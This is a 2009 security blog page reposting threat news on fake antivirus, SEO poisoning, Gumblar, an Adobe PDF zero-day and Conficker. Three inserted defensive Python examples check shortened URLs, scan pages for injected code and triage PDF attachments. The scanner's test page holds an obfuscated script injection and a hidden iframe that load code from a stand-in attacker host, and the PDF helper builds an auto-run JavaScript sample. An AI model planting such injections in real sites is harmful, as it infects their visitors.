From: http://debtconsolidation.topnewsdigest.com/2009/12/12-things-computer-users-should-fear-in-2010/
About once a year, computer security news leaps out of the technology section and onto the front page and the top of network news broadcasts.  This year, the day was April Fools' Day, as the Conficker worm became the latest malicious program with the power to eat the Internet.  Somehow, we soldiered on, most of us without ever having to kick on the emergency power generators or dig into that can of spam in the basement shelter.
But Conficker, while no dramatic outbreak, was also no laughing matter to the hundreds of thousands of Web users who were infected.  The problem with the hype cycle in computer security news is that it can have an incremental "cry wolf" effect on computer users.  The odds that the Internet will topple over in 2010 are, once again, quite low.  But serious threats abound, and the bad guys are still mostly outpacing the good guys in our virtual world, which will be slightly more dangerous next year than it was this year. Here are 12 reasons why:
1. E-mail attachments are back
The LoveBug and Melissa viruses, which brought the Web to its knees 10 years ago, both used the simplest of delivery mechanisms: an e-mail attachment.  Sure enough, that method stopped working after companies banned attachments and users wised up, and attachment viruses nearly dried up.  Then a new generation of users came online who hadn't learned the Melissa lesson, and older users forgot. So this year virus writers began dusting off their old methods and, surprise, they worked again.  Next year, be on guard for unexpected attachments, says Carl Leonard, head of the Websense threat lab.
"Sometimes you think this stuff has gone away and then it comes back," he said. "We're definitely seeing an uptick in Trojans that come through e-mail." 
2. Anti-virus products less effective
Old-fashioned virus screening tools now catch only about three out of every four viruses through what's called "signature-based" detection, says Martin Lee of Symantec.  Basic anti-virus tools scan all programs using a list of known malicious programs, looking for electronic "signatures."  Virus writers now generate so much malicious software that the good guys just can't keep up. To make matters worse, virus writers are employing a technique known as "polymorphism," so the virus can electronically mutate and evade detection.  That means about 25 percent of viruses can evade detection by scanners. New "heuristic" antivirus software detects malicious programs by watching what they do rather than inspecting what they are, but these products are far from perfect.
Making matters worse, viruses are now more stealthy after infections. Once upon a time, an infection was obvious, thanks to a dramatic slowdown in performance or some other obvious symptom.  Not true today.
"It's become increasingly difficult for people to be aware they've become infected," Lee said. "Often, end users just will not realize something has happened."
With few guarantees for protection, it's more important than ever to keep the kids off music piracy sites and for you to avoid other unsavory Web places — and you know the ones I mean.
3. Fake anti-virus software
Knowing that your antivirus product might not be doing the job, you might be tempted to look online for an alternative, or to try one that surprisingly pops up on your desktop.  That’s a bad idea: It's probably a criminal trying to extort you for money.  The art of selling rogue anti-virus software was perfected in 2009. Leonard says consumers shelled out $150 million for fake antivirus programs last year.
"People are selling malicious software and dressing it up as an antivirus product," he said.  "It surprises me the volume that they are selling. You would think people have become used to seeing these things." 
Obviously not. The Federal Trade Commission did shut down two rogue sellers last year, but not until they allegedly tricked nearly 1 million consumers into downloading their software.
The technique, which works like a charm, will expand next year.
4. Social networking
Facebook-based attacks grew dramatically in 2009, and will continue to increase in the coming year.
There are basically two flavors: viruses that take advantage of the platform's liberal rules for information sharing among applications, and impersonation/identity theft, where a criminal hijacks an innocent user's account and tricks trusted friends and family. But other variations are certain to appear. Criminals can use publicly available information to personalize attacks ("Hey, check out these pictures from Paramus Catholic's Class of 1986!"). Facebook is easily farmed for the answers to password-reset questions such as "What was your high school mascot?"  And all those "click here" e-mails from Facebook are a Christmas present for would-be phishers, who can easily imitate them.
"People are getting comfortable in social networking situations and I think that they should really re-examine their level of trust and interaction," said Mary Landesman, senior security researcher at ScanSafe. 
And remember, even if Facebook old-timers are too smart for all these tricks, the service is teeming with older newbies.  If you've been friended by mom (or grandma) you know what I mean.  They'll have to endure the Facebook privacy learning curve, too. Be generous.  Spend a few minutes with older relatives this holiday getting them to tighten up their privacy settings.
5. Botnets
The bane of the Internet for the past five years, botnets, or armies of compromised home computers, will remain a problem this year.  And it may be even worse: botnets have become much more resilient.  Once upon a time, botnets could be disrupted by "cutting off their head," or disabling their command and control computers.  But now criminals are "building disaster recovery" into the networks, Symantec's Lee said.  That makes them even more difficult to knock offline.
"You must have grudging respect for them and their techniques," Lee said.
6. Spam
Spammers took a body blow during 2009 when the notorious McColo Internet Service Provider was kicked off-line.  The volume of spam plummeted from around 80 percent of all e-mail to 20 percent.  Temporarily.  By year's end, nine out of 10 e-mails were spam, and the number keeps climbing.
"Can it get to 95 percent?," Lee asked, rhetorically. "It never ceases to amaze me how much we put up with this." 
7. Finally, Apple gets respect - from cybercriminals
For years, the worst-kept secret in the computer security world was the safety of using Macintosh computers. It seemed that criminals didn't bother trying to attack Macs. This was no political statement, however. It was merely pragmatism: Apple products were a small target. But with the uptick in Mac market share, the increasing popularity of Apple's Safari Web browser and the ubiquity of the iPhone, expect criminals to target Steve Jobs' products, says Leonard.  Already, he says, there have been a handful of iPhone attacks.
"Malware authors know where people are going," he said. "It's more worthwhile for them to go after these platforms."
8. Cell phones
Speaking of iPhones, 2010 might be the year that we see a significant attack against cell phone or smart phone users. Such an attack has been predicted for years, and has not yet materialized.  But each year, cell phones become more powerful, contain more personal information and are used for more financial transactions. In other words, they become "juicier targets" for criminals, says Lee.  An obvious attack — like something that wipes out phone books — might not be the breakthrough cell phone virus.  Lee says consumers should be on the lookout for a simple automated way to use mobile phones to steal cash. One possibility: some TV shows urge consumers to send text messages at $1 apiece. What happens when a criminal figures out how to redirect such messages, or initiate them?
9. SEO poisoning
You have probably noticed that companies can "game" Google and other search engines, puffing up their search results with tricks such as creating fake pages that link heavily to one another.  Annoying, but relatively harmless.  Unfortunately, the bad guys have perfected the same method and use it to attack information seekers mercilessly every time a large news event occurs.  Perhaps hundreds of thousands of users were infected this way after the death of Michael Jackson; getting a booby-trapped Web page to rank 5th or 6th in a Google search for "Michael Jackson," even for just a few minutes, is probably the most effective malware delivery technique in use today.
"We see this sort of attack daily and especially when a signature event occurs, like Michael Jackson's death," said Leonard. Expect much more next year.  When the next big news hits — however self-serving this may sound — stick with news Web sites you trust.
10. Windows 7
Naturally, as the year progresses, criminals will set their sights on the increasing install base of Windows 7.  Microsoft has continued to improve security and delivery of updates to its flagship operating system.  But there will be problems, no doubt. And then there's this troubling notion: Eight out of 10 existing Windows viruses will run on Windows 7, says Leonard.  Impressive forward-compatibility from the bad guys. For consumers, it means there's no time to be complacent.
11. URL shorteners
Services like bit.ly make sending links through Twitter and e-mail infinitely easier. Unfortunately, they also let criminals turn obviously troublesome URLs, like https://RomanianDarkLords.Ro/$$$eBay.com, into innocuous-looking links like http://bit.ly/5uuWwo.
That makes life easier for criminals, and harder for you, as it takes away one possible hint that a link is trouble.
Websense recently partnered with Bit.ly to help make the process safer. But you should stick with the old rule: Never click on a link you didn't expect, and always manually type URLs into your browser's address bar.
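A check a practitioner can run before clicking: expand the short link without loading the destination, then look at where the real registrable domain sits. This is an added example for this column, not code from Websense or Bit.ly. The shortened URL and the RomanianDarkLords address are the page's own illustration, the redirect table that stands in for the shortener is constructed, and `registrable_domain` is a deliberate simplification (it ignores multi-part suffixes such as co.uk); `http_head` is the live fetcher for real use.

```python
import http.client
from urllib.parse import urlsplit, urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}


def unshorten(url, fetch, max_hops=5):
    """Walk a redirect chain without loading any page content.

    `fetch(url)` performs ONE request for `url` without following redirects
    and returns (status_code, location_header_or_None).  The returned list is
    every URL visited; the last entry is where a click would actually land.
    """
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in REDIRECT_CODES or not location:
            return chain
        # Location may be relative; resolve it against the URL that sent it.
        chain.append(urljoin(chain[-1], location))
    raise RuntimeError("more than %d redirects; refusing to continue" % max_hops)


def http_head(url, timeout=5):
    """Live fetch function for unshorten(): a single HEAD request, no redirects."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    conn.request("HEAD", target)
    resp = conn.getresponse()
    return resp.status, resp.getheader("Location")


def registrable_domain(host):
    """Assumed simplification: the last two labels.  Production code should
    consult the Public Suffix List so that e.g. shop.example.co.uk is handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_warning(url, brands):
    """Return a warning if a brand name appears anywhere in the URL except as
    its registrable domain (in the path, the query, or a leading subdomain).
    That is the trick in the page's RomanianDarkLords example.  None if clean."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    owner = registrable_domain(host)
    haystack = (host + parts.path + "?" + parts.query).lower()
    for brand in brands:
        brand = brand.lower()
        if brand in haystack and brand not in owner:
            return "'%s' appears in the link but the site is actually %s" % (brand, owner)
    return None


if __name__ == "__main__":
    # Constructed redirect table standing in for the shortener; both URLs are
    # the page's own illustration.  For a live lookup use unshorten(url, http_head).
    table = {
        "http://bit.ly/5uuWwo": (301, "https://RomanianDarkLords.Ro/$$$eBay.com"),
        "https://RomanianDarkLords.Ro/$$$eBay.com": (200, None),
    }
    chain = unshorten("http://bit.ly/5uuWwo", lambda u: table[u])
    print(" -> ".join(chain))
    print(lookalike_warning(chain[-1], ["ebay.com"]))
```

The fetch function is injected so the chain can be walked with HEAD requests only (no page body is ever rendered), and the hop limit stops a shortener that loops on itself.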
12. Gumblar
Last but not least, Landesman says the most troublesome development of 2009 could be the breakout security problem of 2010. The so-called Gumblar worm used an advanced technique to build a new kind of botnet. Rather than target thousands of home computers directly, Gumblar attacked Web hosts (Web sites) and turned them into "carriers."  The program pulled down a Web site's code, injected a hidden malicious program, then uploaded the now booby-trapped site back in place.
Because Web sites act as a kind of hub online, they have the potential to spread a serious attack much more quickly. And 10,000 compromised Web sites are much harder to shut down than 10,000 compromised home computers, Landesman said.
Worse yet, a seriously successful Gumblar-style attack could undermine Web users' trust in the Internet. Sites that are one day safe and trustworthy may the next day be dangerous. That would severely hamper security systems that are based on "trusted" sites.
"When you have compromised sites acting as the host itself, the notion of good vs. bad is completely gone," Landesman said.  "Users will find fewer and fewer sites that they can trust; whatever trust they do have could be very fleeting."
Already, Gumblar-infected sites have transmitted code to visiting PCs that redirected all Google searches to pay-per-click Web sites, netting a tidy sum for creators.
Gumblar was declared a bigger problem than Conficker in May by ScanSafe, and even though its network of compromised Web sites was eventually tamed during the year, Landesman is convinced that the technique will see many copycats.
"It's one of the attacks we are assured of seeing in large quantities in 2010," she said.
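What this passage describes, a legitimate page with hidden code injected into it, is something a site owner or a Web proxy can look for. The scanner below is an added example, not ScanSafe's or the article's code. Its indicators (invisible iframes, inline scripts that decode and execute strings, external scripts pulled from a host other than the page's own) are assumed general heuristics rather than any signature for Gumblar itself, and the sample page is constructed.

```python
import re
from html.parser import HTMLParser


class InjectedContentScanner(HTMLParser):
    """Collect markup patterns typical of code injected into a compromised page.

    The indicators are assumed, general-purpose heuristics, not a signature
    for Gumblar or any other family:
      * iframes that are hidden or sized to be invisible
      * inline scripts that decode and execute a string at run time
      * external scripts loaded from a host other than the page's own
    """

    HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
    DECODE_EXEC = re.compile(r"\b(?:eval|unescape|document\.write)\s*\(|fromCharCode", re.I)
    LONG_ESCAPED = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}){20,}", re.I)
    SCRIPT_HOST = re.compile(r"^(?:https?:)?//([^/?#]+)", re.I)

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []          # list of (indicator, detail)
        self._in_script = False

    def _foreign(self, host):
        host = host.lower()
        return host != self.page_host and not host.endswith("." + self.page_host)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
            hidden = bool(self.HIDDEN_STYLE.search(a.get("style", "")))
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            m = self.SCRIPT_HOST.match(a.get("src", ""))
            if m and self._foreign(m.group(1)):
                self.findings.append(("third-party-script", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # script bodies arrive here as raw text; look for decode-and-run idioms
        if self._in_script and (self.DECODE_EXEC.search(data) or self.LONG_ESCAPED.search(data)):
            self.findings.append(("obfuscated-script", data.strip()[:60]))


def scan_html(html, page_host):
    """Return the list of (indicator, detail) findings for one page."""
    scanner = InjectedContentScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: an ordinary page with an injected decoder script, an
# invisible iframe and a script pulled from an unrelated host.
SAMPLE_PAGE = """<html><head><title>Recipes</title>
<script src="/js/site.js"></script></head><body>
<h1>Welcome</h1><p>Our cookies are legendary.</p>
<script>var p=unescape("%3Cscript%20src%3D%22http%3A%2F%2Fbad.example%2Fa.js%22%3E%3C%2Fscript%3E");document.write(p);</script>
<iframe src="http://bad.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script src="http://cdn.stats-example.net/t.js"></script>
</body></html>"""

if __name__ == "__main__":
    for indicator, detail in scan_html(SAMPLE_PAGE, "recipes.example.org"):
        print("%-20s %s" % (indicator, detail))
```

Run against a site's own pages on a schedule, a change in the findings list between two runs is the signal worth paging on; a page that legitimately embeds a third-party analytics script will show up once and can then be allow-listed.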
Welcome to the Proxy Update, your source of news and information on Proxies and their role in network security.
Wednesday, December 23, 2009
Tuesday, December 22, 2009
Business Use of Social Media Surges
From: http://www.marketingprofs.com/charts/2009/3267/business-use-of-social-media-surges
The use of Facebook, Twitter, and blogs for business purposes has skyrocketed in the last six months—with indications of wider adoption and more frequent sessions, according to research by Palo Alto Networks into application traffic patterns of computer networks.
Facebook is the dominant social networking site in the workplace: 94% of companies used Facebook over the past six months (ended September 2009), compared with 37% six months ago, finds the Application Usage and Risk Report (Fall Edition, 2009).
Sessions consumed per organization by Facebook users increased 192% during the period, while bandwidth consumption jumped 294% to 6.3GB per organization, indicating more frequent or longer periods of use, Palo Alto Networks found.
Below, additional findings from the study.
The prevalence of LinkedIn among business users increased to 89%, compared with 35% six months ago. Bandwidth consumption declined 42%, however, and session consumption declined 22%, indicating less frequent or shorter periods of use.
Twitter is the most popular instant messaging application in the workplace: 89% of companies used Twitter, compared with 35% six months ago.
Sessions consumed per organization by Twitter users increased 252% over the previous six months, indicating more frequent periods of use, while bandwidth consumption jumped 775% to 184 MB per organization, even though tweets are limited to just 140 characters.
Facebook Mail and Facebook Chat applications have become the fourth most commonly used applications within their respective categories. Interestingly, though Facebook Chat was released in April 2008, in a mere 18 months it has become more widely used than Yahoo IM and AIM (within this sample).
Business users are significantly more active than six months ago in their blogging and posting activity. In addition to the frequency with which these applications were found, overall activity increased from several perspectives. The number of application variants found more than doubled to 23, from 11 just six months ago. In addition, total session activity increased by a factor of 39 while total bandwidth consumption increased by a factor of 48.
The adoption of these applications and other enterprise 2.0 applications, in general, is driven by end users rather than IT departments, while pace of adoption is a result of the ease with which they can be accessed, the study finds.
Other key findings:
* 82% of companies use Google Docs, Google's Internet-based suite of document programs, compared with 33% of companies six months ago.
* Not only was Google Docs found more frequently, both the sessions and bandwidth consumed per organization increased approximately 290% over the previous six months.
* 82% of companies use Adobe Connect for Internet conferencing, compared with 35% six months ago.
* 59% of companies use WebEx conferencing, up from 33% six months ago.
About the data: Published by Palo Alto Networks, the Application Usage and Risk Report (Fall Edition, 2009) summarizes the application traffic patterns, between March and September 2009, of more than 200 organizations' networks worldwide, across nine industry categories.
Monday, December 21, 2009
Beware of bad Google search results
From: http://www.eastvalleytribune.com/story/148583
Q. Someone told me that I can't trust Google search results anymore because of hackers. Is this true? - Randal
A. Google has built its empire on a very simple concept: be relevant.
When you search for something on Google, their system for weeding out irrelevant Web sites for any given search phrase has been their "secret sauce" and allowed them to dominate in the world of search.
They process more than 150 million search requests per day, making them far and away the most popular search engine on the planet.
But any technology that attracts that many users will attract those with malicious intent who will focus all their energies on finding ways to exploit those users.
Google is constantly working on ways to deal with something called "SEO poisoning" that is allowing hackers to get malicious Web sites listed, sometimes on the first page of popular Google searches.
SEO stands for "search engine optimization" and is a process used to optimize a Web site for the highest possible ranking in search engines. The closer to the first position in the search results you can get, the more people who will click on it.
Most folks feel comfortable with the search results from Google, never giving any thought to whether a link is safe or not. Most assume that if Google presents it as a result, it must be safe.
Unfortunately, those days are long gone. The bad guys have figured out how to sneak malicious Web sites into Google's results - and they've been doing it for some time.
The most common search terms that are being targeted (but not the only ones) are very current events - things like "swine flu" or "Tiger Woods mistress" that generate a large number of searches in a very short period of time.
The scammers either quickly create Web sites that are rigged with hidden malware and are optimized to rank highly for these breaking events, or they will compromise a legitimate Web site that is highly optimized for these types of searches.
Researchers have found that as many as 50 percent of the top search results on the first few pages of a Google search for fast-breaking stories are laced with malicious links.
And just recently, the malware writers started targeting folks that click on the Google "Doodle," which is usually a date-specific image that graces the Google logo above the search box. It could be an image of Santa Claus on Christmas, Christopher Columbus on Columbus day, etc., which if clicked generates a search for the subject being represented by the imagery.
Most recently, the "Esperanto flag" displayed on the 150th anniversary of the birth of L. L. Zamenhof, the language's creator, was targeted and resulted in 27 of the first 50 results containing some form of malware, according to a research scientist at Barracuda Networks.
As a result of these tricks, a number of companies have created programs such as McAfee's Site Advisor or Norton's Site Safety that can help the average user avoid being exploited by stepping in and warning them. Two of my favorites are actually free and easy to use. The first is K9 Web Protection (www.K9WebProtection.com), which is a solid parental control program that also does a great job of blocking access to Web sites that have suspicious coding on them. If you don't want or need the parental controls, you can turn them off and just use the malware protection, which is one of the best I've tested.
The other is a plug-in to most popular browsers called Web Of Trust (www.mywot.com) that uses the entire community of users to help warn others of suspicious sites. The warnings extend beyond malware to warn against sites that might have adware, phishing attacks, browser exploits, Internet fraud and spam. But because the ratings are user-based, it will have more false positives.
Households with children - especially teenagers who tend to have no fear of clicking on anything - should strongly consider using one of the many tools for warning against or blocking malicious sites and have a frank discussion about this fast-growing way of getting infected online.
Sunday, December 20, 2009
Zero-day vulnerability threatens Adobe users
From Network World this week:
Adobe is investigating possible vulnerabilities in its Reader and Acrobat applications that could allow an attacker to execute malicious code on Windows machines and completely compromise them.
Adobe issued a notification on a blog signaling it's preparing a response regarding claims that its Reader and Acrobat versions 9.2 and earlier are vulnerable to an attack via a malicious PDF. Symantec senior researcher Ben Greenbaum has been in touch with Adobe since Monday on the issue, adding Symantec has updated its security software to defend against this latest threat.
"We were contacted by a researcher who discovered the attack being exploited in the wild," Greenbaum says. "It's mostly targeted e-mail."
The attack would include the malicious PDF as an e-mail attachment to the victim, and the malicious code would execute on any unprotected Windows machine when the recipient clicked on it.
A successful attack could entirely compromise the victim's machine, and it's likely this is being used to try and spread botnet code, Greenbaum notes. He adds that there are other possible methods that could be used to disseminate the malicious PDF attack code, including downloading the code from the Internet.
Adobe Tuesday indicated it will make statements related to Adobe Reader and Adobe Acrobat and this latest threat at its security information alert blog.
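Both the attachment warning in item 1 of the "12 things" column above and this Adobe report are cases of a booby-trapped file arriving by e-mail, so the check a mail gateway wants is the same: before the recipient opens a PDF, look for the features that let a document run code or launch something. The triage below is an added example, not Adobe's or Symantec's code. The page does not say which Reader feature the attack abuses, so the list of name tokens is a general active-content check rather than a signature, and the sample PDF is constructed inside the block.

```python
import re
import zlib

# PDF name tokens that mean the document can run code or open something when
# it is viewed.  The page does not say which Reader feature the attack abuses,
# so this is an assumed general active-content list, not a signature.
ACTIVE_CONTENT_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                        b"/Launch", b"/EmbeddedFile", b"/RichMedia"]


def inflate_streams(data):
    """Return data plus the decoded body of every FlateDecode stream, so that
    keywords hidden inside compressed objects are visible to the scan."""
    parts = [data]
    for m in re.finditer(rb"/FlateDecode.*?stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            parts.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # corrupt or partial stream; the raw bytes are still searched
    return b"\n".join(parts)


def normalize_names(data):
    """Undo the #xx hex escapes PDF allows inside names (e.g. /J#61vaScript),
    a common way to hide /JavaScript from naive substring scanners."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def pdf_indicators(data):
    """Count each active-content name in the document, after decompressing
    streams and undoing name escapes.  An empty dict means nothing was found."""
    text = normalize_names(inflate_streams(data))
    counts = {}
    for name in ACTIVE_CONTENT_NAMES:
        # the name must end at a delimiter so that /JS does not also count /JSx
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", text))
        if n:
            counts[name.decode()] = n
    return counts


def attachment_verdict(filename, data):
    """Gateway decision for one attachment: (quarantine: bool, reason)."""
    is_pdf = data.startswith(b"%PDF-")
    if filename.lower().endswith(".pdf") != is_pdf:
        return True, "extension and content disagree for %s" % filename
    if not is_pdf:
        return False, "not a PDF; outside the scope of this check"
    found = pdf_indicators(data)
    if found:
        return True, "active content: " + ", ".join("%s x%d" % kv for kv in sorted(found.items()))
    return False, "no active-content indicators"


def build_sample_pdf(js, obfuscate=True):
    """Construct a minimal PDF for the example (enough structure for the scan,
    not a fully valid file): an /OpenAction that runs `js` from a compressed
    stream, with the /JavaScript name hex-escaped as an evasive sample might."""
    action = b"/J#61vaScript" if obfuscate else b"/JavaScript"
    body = zlib.compress(js)
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S " + action + b" /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + body + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    print(attachment_verdict("invoice.pdf", build_sample_pdf(b"app.alert('hi');")))
    print(attachment_verdict("report.pdf", b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"))
```

This is a triage, not a verdict on maliciousness: plenty of legitimate forms carry /JavaScript or /AA. The point is that a document with any of these tokens, arriving unexpectedly by e-mail, is the one to hold and open in a sandbox rather than on the recipient's desktop.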
Saturday, December 19, 2009
3 Basic Steps to Avoid Joining a Botnet
Network World recently ran an article titled "3 Basic Steps to Avoid Joining a Botnet".  Their recommendations were:
Tip 1: Have work AND home machines regularly updated with patches and antivirus software
Tip 2: Use the latest browser versions
Tip 3: Be a little more careful when you get a link or an attachment.
While all these are good tips, they are all targeted at your end-user. As an IT admin, we all know how difficult it is to convince an end-user to follow tips like these.
That's why it's also important to have a proxy in the network acting as a secure web gateway to protect end-users from as much malware as possible. It's just as important to keep the proxy up to date with the latest anti-malware software and OS versions.
Friday, December 18, 2009
Chinese ISP hosts 1 in 7 Conficker infections
From Network World:
China Telecom's Chinanet seems to have been hit hardest, says Shadowserver
By Robert McMillan, IDG News Service
December 17, 2009 03:41 AM ET
Security experts have known for months that some countries have had a harder time battling the Conficker worm than others. But thanks to data released Wednesday by Shadowserver, a volunteer-run organization, they now have a better idea of which Internet Service Providers have the biggest problem.
In terms of the total number of infected computers, China Telecom's Chinanet seems to have been hardest hit by the worm, which began spreading late last year.
The Chinese ISP had more than 1 million infected systems within its massive 94 million IP address network. That amounts to just over 1 percent of the company's network. But while Chinanet has the most total infections -- amounting to about 14 percent of all known copies of the worm -- it doesn't have the highest percentage of infected systems. Other, smaller ISPs show up on Shadowserver's list with infection rates as high as 25 percent.
"There's definitely a challenge at the ISP level with remediation," said Andre DiMino one of Shadowserver's founders.
Conficker got a lot of attention earlier in the year, including a late March segment on the 60 Minutes television program warning of an April 1 upgrade to the worm. Because Conficker is the most widespread botnet ever reported, security experts worry that it could be used to launch an unprecedented denial of service attack.
But, despite its size, the network of hacked computers has been associated with very little malicious activity. That's given computer users a false sense of security, DiMino said.
"The rate of remediation is not as good as we would have liked," he said. "The awareness and the alarm about Conficker kind of faded out after April 1st because nothing really dramatic happened."
Some ISPs, such as U.S.-based Comcast, have taken to notifying users when their computers are infected or offering them free security software so they can get cleaned up. Comcast had a 0.05 percent infection rate, according to Shadowserver's numbers. AT&T was measured at 0.02 percent.
The top two ISPs on Shadowserver's list, China Telecom and China Unicom (with 472,892 infected IPs) did not have any immediate official comment on the Conficker infections, but customer support reps for both companies said that helping customers with virus problems is outside of the scope of their service.
Thursday, December 17, 2009
Cisco / Ironport integration goes one step further
Ironport has announced that its support website has moved under Cisco's support website today.  Anyone using the Ironport website for support will now have to get a Cisco support login, and visit the support resources at that location.
It appears the Ironport acquisition is now almost fully complete at Cisco.
Wednesday, December 16, 2009
Blue Coat starts a security blog
Blue Coat Systems has started a new security blog, in addition to the security alerts it already sends out to customers. For those interested in hearing what Blue Coat's top engineers and product managers have to say about the latest security threats, you can visit their security landing page to read the blog, see the security alerts, and view some graphical information about the latest malware threats.
Sunday, December 13, 2009
Vulnerability Management: The Missing Link In Mobile Device Security
From: Dark Reading
If you're not in the office these days, then chances are you've brought the office with you. From laptop computers to smartphones, mobile devices are becoming standard issue in business. But the security of those devices is a lot less certain.
According to market analysis firm Gartner, global smartphone sales in the first quarter of 2009 were 36.4 million units, an increase of 12.7 percent compared to the same quarter in 2008. For many organizations, though, enterprise adoption of smartphones as an application platform has been slowed by concerns about basic security -- and the absence of clearly defined methods for performing vulnerability management on the small devices.
"We have seen huge interest from customers who are interested in protecting smartphones so they can deploy them as IP phones or terminals -- and the only reason they aren't [deploying the devices] is vulnerability management," says Ravi Varanasi, vice president of engineering with security system vendor Sipera.
Varanasi, who was one of the developers of Cisco's network access control (NAC) technology, says vulnerability management is the missing piece in mobile device security. "If we can solve the problem, I think it will be a free-for-all in the marketplace," he says. If technologists can improve solutions for mobile device user identity, authentication, and encryption, Varanasi adds, then the smartphone market could skyrocket even faster.
For most organizations, one of the issues in vulnerability management is that a relationship with a network service provider is usually required for deployment. Jonathon Gordon, director of marketing for Allot Communications, notes "providers are starting to be able to provide clean lines, cleaned of spam and viruses, and behind a firewall. This is starting to be offered to corporations, and down the line, these will be available with a [service-level agreement] attached."
Gordon says a growing reliance on smartphones, in particular, will lead to more comprehensive security partnerships with the network providers.
"There is a case for pushing some security features up the line, so the enterprise doesn't have to deal with them itself. They would be ubiquitous, whether [the service is] on the mobile or the fixed side," he says. "If [enterprises] rely on mobile devices as much as fixed devices, they assume they get the same service whether it's fixed or mobile. That's the underlying assumption going forward -- the expectations for mobile are that more and more people will expect it to work just as fixed wired networking does."
Choosing Their Battles
For now, however, most organizations are more worried about protecting the data on their devices than about the devices themselves, says Derek Brink, vice president and research fellow in the IT security practice at market research firm Aberdeen.
"From previous studies, I've seen it be much more about the data than about the vulnerabilities on a platform basis," Brink says. "These mobile devices are platforms in their own rights, and I think in the long term they'll be just as vulnerable to attacks as the desktop. The data that flows out to the device and is stored on the device is the highest priority."
Ultimately, though, Brink says traditional concepts of vulnerability management will become an important part of managing mobile devices. "The vulnerabilities are starting to appear, and it's not as big as the traditional platform market, but the data issue is here today, and people are concerned," he says. "In the future and ongoing, it will be the same group of issues dealt with -- whether the network is wireless or cable-connected."
Sipera's Varanasi says as the concerns of mobile and fixed assets converge, there will also be special security issues for mobile devices.
"It's not just the status of security software, but an application awareness that we need to know before we allow the phone on the network," he says. "If [the user is] running Skype, for example, we want to know about it before we allow the phone onto the network. The span of the application is very critical for the network asset. Essentially we call it CAC [call admission control], and we assess the posture of the phone, make sure it runs the proper SIP stack, and make sure it's enabled for secure and authenticated communication."
The process of managing vulnerabilities in mobile devices will become increasingly complex, just as it did in the wired world, experts say. The question for many organizations today is whether the process will grow to cover a fleet of devices that expands slowly -- or explodes as employees are allowed to bring their own phones into the corporate fold.
Saturday, December 12, 2009
Malware Threats Double in 2009
Trend Micro and AV-Test.org are both reporting a huge increase in malware.
Malware threats have undergone many, many stages of evolution over the years. First it was DOS viruses, then macro viruses, then mass-mailers, then botnets, then Web threats… the only constants seem to be that these are growing both in number and in danger.
TrendLabs has seen this continued growth of malware. The effects on users are clear: in the first six months of 2008, the Trend Micro World Virus Tracking Center (WTC) recorded that 253.4 million systems were infected with malware. The comparable volume for 2009 is almost double at 491.2 million.
While not a welcome development, this wasn’t unexpected either. The official 2009 Trend Micro forecast pointed out that malware threats had been growing for years, and 2009 was going to see more of the same.
It’s not just limited to Trend Micro, either. AV-Test.org has released their findings for the first half of the year recently, with similar results. Both organizations expect the growth to continue, with little relief in sight.
Friday, December 11, 2009
Cyber-criminals cashing in with online pharmacies
From: http://technology.timesonline.co.uk/tol/news/tech_and_web/article6935651.ece
Thousands of Britons are putting their health and bank accounts at risk by going online to buy drugs from bogus internet pharmacies run by Russian cyber-criminals, according to a new report.
Despite repeated warnings, people eager to protect themselves against a range of diseases, such as swine flu, are shopping at fake online pharmacies with names such as Canadian Pharmacy or European Pharmacy.
The sites, which even carry forged copies of certificates supposedly guaranteeing their authenticity, are run by Russian criminal gangs that are making millions by flooding the internet with billions of spam messages selling drugs including Tamiflu and Viagra.
Those who are tempted by the offers of cheap drugs risk receiving potentially harmful prescriptions and could be putting their credit card and other personal details in the hands of conmen, according to an investigation by Sophos, an internet security company.
Research by Sophos into one criminal network found that fears over the spread of swine flu have sent demand for Tamiflu soaring in the US, Germany, the UK, Canada and France.
The Department of Health has said that more than three million healthy British children will be offered vaccinations against swine flu after a “striking rise” in the number of under-fives requiring hospital treatment.
However, the deaths of 214 people in Britain have been connected with the virus. Graham Cluley, of Sophos, said: “It is essential that we all resist the panic-induced temptation to purchase Tamiflu online. The criminal gangs working behind the scenes at fake internet pharmacies are putting their customers’ health, personal information and credit card details at risk.
“They have no problem breaking the law by spamming millions of people to promote these websites, so you can be sure they’ll have no qualms in exploiting your confidential data or selling you medications, which may put your life in danger. If you think you need medication go to your real doctor and stay away from quacks on the internet,” he added.
